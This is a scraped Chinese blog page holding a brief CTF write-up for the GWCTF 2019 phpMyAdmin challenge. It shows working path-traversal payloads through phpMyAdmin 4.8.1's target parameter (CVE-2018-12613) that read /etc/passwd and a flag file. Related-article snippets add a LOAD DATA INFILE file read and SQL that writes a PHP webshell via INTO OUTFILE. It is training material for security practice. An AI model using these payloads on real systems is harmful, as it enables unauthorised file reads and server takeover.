GWCTF 2019]我有一个数据库 phpmyadmin任意文件读取

最新推荐文章于 2024-01-31 18:28:18 发布
最新推荐文章于 2024-01-31 18:28:18 发布
阅读量335 收藏 1
点赞数
分类专栏: buu # web之每日一题 文章标签: php 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shannidawang/article/details/120470612
版权
  • phpmyadmin任意文件读取

进入phpmyadmin
在这里插入图片描述
phpmyadmin4.8.0-4.8.1存在文件包含漏洞
直接上payload读取passwd文件

?target=db_datadict.php%253f/../../../../../../../../etc/passwd

读取成功,尝试读取flag文件

/phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../../../flag
samh1777
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[GWCTF 2019]我有一个数据库
wikey 的博客
03-30 215
看到这个phpmyadmin4.8.1版本文件包含漏洞,问题出在index.php的target参数位置。直接就是乱码,联想到题目的数据库,那问题就i一定出现在数据库里,可以用两个扫描工具扫描试试。
phpMyAdmin(LOAD DATA INFILE) 任意文件读取漏洞(测试)
cj_Hydra's Blog
04-23 1491
前言: 最近在做ctf题时发现关于mysql任意文件读取漏洞的考点非常频繁,而且一直都朦胧不清,也没去学习,在不久前的DDCTF和国赛,还有最近的Nu1lCTF中都考到了这个点,利用Load data infile语法。在mysql客户端登陆mysql服务端后,客户端执行语句Load data local infile ‘/etc/passwd’ into table proc;,从而可以导致my...
phpMyAdmin 2.x版本任意文件读取
网络安全。
01-18 857
0x01 简介 phpmyadmin scripts/setup.php 页面存在反序列化漏洞(WooYun-2016-199433) phpmyadmin 2.x版本中存在一处反序列化漏洞,通过该漏洞,攻击者可以读取任意文件或执行任意代码。 0x02 漏洞复现 POST /scripts/setup.php HTTP/1.1 Host: ip:8080 User-Agent: Mozilla/5...
安全开发-PHPMyadmin任意文件读取脚本编写
wjq18827615690的博客
01-31 216
https://laosec.cn/2021/01/27/%E5%AE%89%E5%85%A8%E5%BC%80%E5%8F%91-PHPMyadmin%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E8%84%9A%E6%9C%AC%E7%BC%96%E5%86%99/
phpmyadmin 无法读取文件
weixin_34252686的博客
04-17 127
为什么80%的码农都做不了架构师?>>> ...
mysql phpmyadmin文件_瑞丽网MYSQL弱口令(phpMyAdmin对外开放,可读写文件)
weixin_39778400的博客
01-21 121
root:x:0:0:root:/root:/bin/bashbin:x:1:1:bin:/bin:/sbin/nologindaemon:x:2:2:daemon:/sbin:/sbin/nologinadm:x:3:4:adm:/var/adm:/sbin/nologinlp:x:4:7:lp:/var/spool/lpd:/sbin/nologinsync:x:5:0:sync:/sbin:...
如何解决phpmyadmin导入数据库文件最大限制2048KB
12-19
在使用PHPMyAdmin管理MySQL数据库时,可能会遇到一个常见的问题,即当尝试导入大型数据库文件时,系统会提示“导入数据库文件最大限制2048KB”。这是因为PHP默认设置对上传文件大小和内存使用有限制。以下是解决这个...
Adminer≤4.6.2任意文件读取漏洞1
08-03
然而,在Adminer的某些旧版本,特别是≤4.6.2,存在一个严重的安全漏洞,允许恶意用户执行任意文件读取。 **0x02 漏洞原理** 该漏洞主要源于MySQL中的`LOAD DATA INFILE`命令的安全缺陷。`LOAD DATA INFILE`用于从...
adminer一个文件轻松管理数据库phpmyadmin好太多哦
03-16
adminer一个文件轻松管理数据库phpmyadmin好太多哦
phpMyAdmin一个基于Web的MySQLMariaDB数据库管理工具
08-07
**phpMyAdmin** 是一个非常流行的开源工具,用于通过Web界面管理MySQL和MariaDB数据库。它的功能强大且易于使用,使得非技术用户也能方便地执行常见的数据库管理任务,如创建、修改和删除数据库表,运行SQL查询,...
PhpMyadmin任意文件读取漏洞
cnbird's blog
11-07 5722
libraries/import/xml.php中 unset($data); /** * Load the XML string * * The option LIBXML_COMPACT is specified because it can * result in increased performance without the need
登录phpmyadmin获取系统shell
R3332136304的博客
06-28 251
在对目标系统进行目录扫描时发现该web系统存在phpinfo信息泄露以及phpmyadmin管理后台 目录扫描工具为 dirsearch 访问 phpmyadmin 发现存在弱口令 root/root 由于 phpmyadmin 可以直接执行sql语句,所以想直接通过 phpmyadmin 执行 sql 语句读取文件以及写入 webshell。 执行 SHOW GLOBAL VARIABLES LIKE "%secure_file_priv%" 发现值为NULL,无写入读写文件权限。 mysql 数据库
PHPmyadmin获取权限
qq_45566117的博客
12-07 418
一、PHPmyadmin账号和密码 二、phpmyadmin拿shell的两种方法 1、低版本:SELECT “<?php @assert($_REQUEST["admin"]);?>” INTO OUTFILE ‘/网站绝对路径/shell.php’ 2、高版本:show variables like ‘%secure%’ show variables like ‘%general%’ set global general_log=‘on’; SET global general_log_f
[GWCTF 2019]我有一个数据库 wp
m0_55185160的博客
04-23 4357
得到了/phpmyadmin/路径,加上题目是我有一个数据库,于是想到应该本题就是和phpmyadmin数据库有关 我们可以看到phpmyadmin的版本为4.8.1,搜索后发现这个版本的phpmyadmin存在漏洞CVE-2018-12613,下面我们复现一下漏洞。 首先分析一下源码: index.php 关于target的部分 $target_blacklist = array ( 'imp..
[GWCTF 2019]我有一个数据库&&getshell
plant1234的博客
03-24 2770
BUU我有一个数据库&&getsholl 做这题的话目的是为了复现 phpMyadmin(CVE-2018-12613)后台任意文件包含漏洞 这题的话打开看是乱码,但查看响应还是有东西的: 多的不说先信息收集一波,直接扫目录,看页面有没有有用的信息 然后。 日常访问有没有:robots.txt 得到: 在发现有phpinfo.php 访问得到: 得到了后端脚本语言php的一些信息 扫描得到: 扫描发现有:phpmyadmin/ 直接访问得到: 发现没有要登陆省去了很多的步骤 尝试用
[GWCTF 2019]我有一个数据库(特详解)
最新发布
qq_74806534的博客
01-31 1万+
记下来就是利用文章里的payload了,这里../回到上一级目录,只要多于5个,能回到根目录就行,etc/passwd是linux存放用户和密码的文件,在根目录。页面一开始乱码,先教大家应该修复的方法,到火狐打开,然后找到小工具里的修复文字编码,就可以了(没有的话可以在定制工具栏里添加)在界面可以查到各服务器的版本,可以去百度各版本服务器的漏洞。他说什么都没有,先dirsearch扫一下。直接看上面那个师傅的文章,十分详细的。查看其他的吧,有个数据库看看去。这里就不一样查了,直接上结论。
[GWCTF 2019]我有一个数据库(文件包含漏洞)
weixin_44110537的博客
10-03 410
一堆乱码,什么都没有. 查看源代码也没有什么隐藏信息. 于是dirsearch扫描一下,发现 有个数据库登入页面. 发现不用登录直接就可以进去了. 但是发现这里面什么都没有. cve-2018-12613-PhpMyadmin后台文件包含 这个漏洞出现在index.php中的 // If we have a valid target, let's load that script instead if (! empty($_REQUEST['target']) && is_st.
任意文件读取怎么读取phpmyadmin密码
05-04
如果您有足够的权限来访问服务器上的文件系统,您可以尝试查找 phpMyAdmin 的配置文件 `config.inc.php`。在该文件中,可以找到用于连接到 MySQL 数据库的用户名和密码。 在 Linux 系统上,您可以使用以下命令来...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值